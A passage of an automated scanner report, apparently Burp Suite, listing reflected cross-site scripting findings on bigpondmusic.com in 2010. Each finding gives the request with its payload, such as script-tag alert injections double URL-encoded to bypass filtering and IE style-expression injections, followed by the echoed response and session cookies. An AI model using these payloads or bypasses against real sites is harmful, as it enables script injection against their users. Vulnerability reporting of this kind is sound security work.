2.15. http://bigpondmusic.com/100/80 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b562'%3bc2936948212 was submitted in the REST URL parameter 2. This input was echoed as 5b562';c2936948212 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /100/805b562'%3bc2936948212 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87691


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
calhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = '100';
   s.prop4 = '805b562';c2936948212';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.16. http://bigpondmusic.com/100/80 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /100/80

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95fa6"style="x:expression(alert(1))"a3ab55095f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /100/80?95fa6"style%3d"x%3aexpression(alert(1))"a3ab55095f4=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:29:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 164679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Get the best 100 albums from
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/100/80?95fa6"style="x:expression(alert(1))"a3ab55095f4=1" />
...[SNIP]...

2.17. http://bigpondmusic.com/CombineScriptHandler.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /CombineScriptHandler.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e1c8'%3b5e1da53fc24 was submitted in the REST URL parameter 1. This input was echoed as 6e1c8';5e1da53fc24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CombineScriptHandler.aspx6e1c8'%3b5e1da53fc24 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
ost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'combinescripthandler.aspx6e1c8';5e1da53fc24';
   
   
       s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel;
   s.prop11 = 'Non-Registered-Music';
   s.prop12 = 'Non-Registe
...[SNIP]...

2.18. http://bigpondmusic.com/CombineScriptHandler.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /CombineScriptHandler.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f was submitted in the REST URL parameter 1. This input was echoed as 665d1"><script>alert(1)</script>d41d805a51f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /CombineScriptHandler.aspx665d1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed41d805a51f HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/CombineScriptHandler.aspx665d1"><script>alert(1)</script>d41d805a51f" />
...[SNIP]...

2.19. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ca3d'%3b95eca681716 was submitted in the REST URL parameter 1. This input was echoed as 4ca3d';95eca681716 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Vouchers4ca3d'%3b95eca681716/GiftBoxSelector HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'vouchers4ca3d';95eca681716';
   s.prop4 = 'giftboxselector';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   
...[SNIP]...

2.20. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4 was submitted in the REST URL parameter 1. This input was echoed as 47902"><script>alert(1)</script>067d355d8b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Vouchers47902%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e067d355d8b4/GiftBoxSelector HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87945


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/Vouchers47902"><script>alert(1)</script>067d355d8b4/GiftBoxSelector" />
...[SNIP]...

2.21. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd4a2'%3b26b7643601d was submitted in the REST URL parameter 2. This input was echoed as bd4a2';26b7643601d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Vouchers/GiftBoxSelectorbd4a2'%3b26b7643601d HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87855


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
taging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'vouchers';
   s.prop4 = 'giftboxselectorbd4a2';26b7643601d';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.22. http://bigpondmusic.com/Vouchers/GiftBoxSelector [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /Vouchers/GiftBoxSelector

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 was submitted in the REST URL parameter 2. This input was echoed as e6c7e"><script>alert(1)</script>1cc45bc0d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Vouchers/GiftBoxSelectore6c7e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1cc45bc0d49 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/Vouchers/GiftBoxSelectore6c7e"><script>alert(1)</script>1cc45bc0d49" />
...[SNIP]...

2.23. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b383'%3b9a24d6a46d7 was submitted in the REST URL parameter 1. This input was echoed as 5b383';9a24d6a46d7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album5b383'%3b9a24d6a46d7/angus-julia-stone/down-the-way HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87992


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album5b383';9a24d6a46d7';
   s.prop4 = 'angus-julia-stone';
   s.prop5 = 'down-the-way';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.
...[SNIP]...

2.24. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49 was submitted in the REST URL parameter 1. This input was echoed as 9ec0c"><script>alert(1)</script>a2da5f79c49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49/angus-julia-stone/down-the-way HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87987


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9ec0c"><script>alert(1)</script>a2da5f79c49/angus-julia-stone/down-the-way" />
...[SNIP]...

2.25. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 was submitted in the h parameter. This input was echoed as b13a6"style="x:expression(alert(1))"ea60f3dc6d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/angus-julia-stone/down-the-way?h=598216448b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Angus &amp; Julia Stone - Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?h=598216448b13a6"style="x:expression(alert(1))"ea60f3dc6d6" />
...[SNIP]...

2.26. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94180"style%3d"x%3aexpression(alert(1))"cea24253dac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94180"style="x:expression(alert(1))"cea24253dac in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /album/angus-julia-stone/down-the-way?94180"style%3d"x%3aexpression(alert(1))"cea24253dac=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Angus &amp; Julia Stone - Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?94180"style="x:expression(alert(1))"cea24253dac=1" />
...[SNIP]...

2.27. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a58b'%3b1ecb978a1bf was submitted in the REST URL parameter 1. This input was echoed as 4a58b';1ecb978a1bf in the application's response.

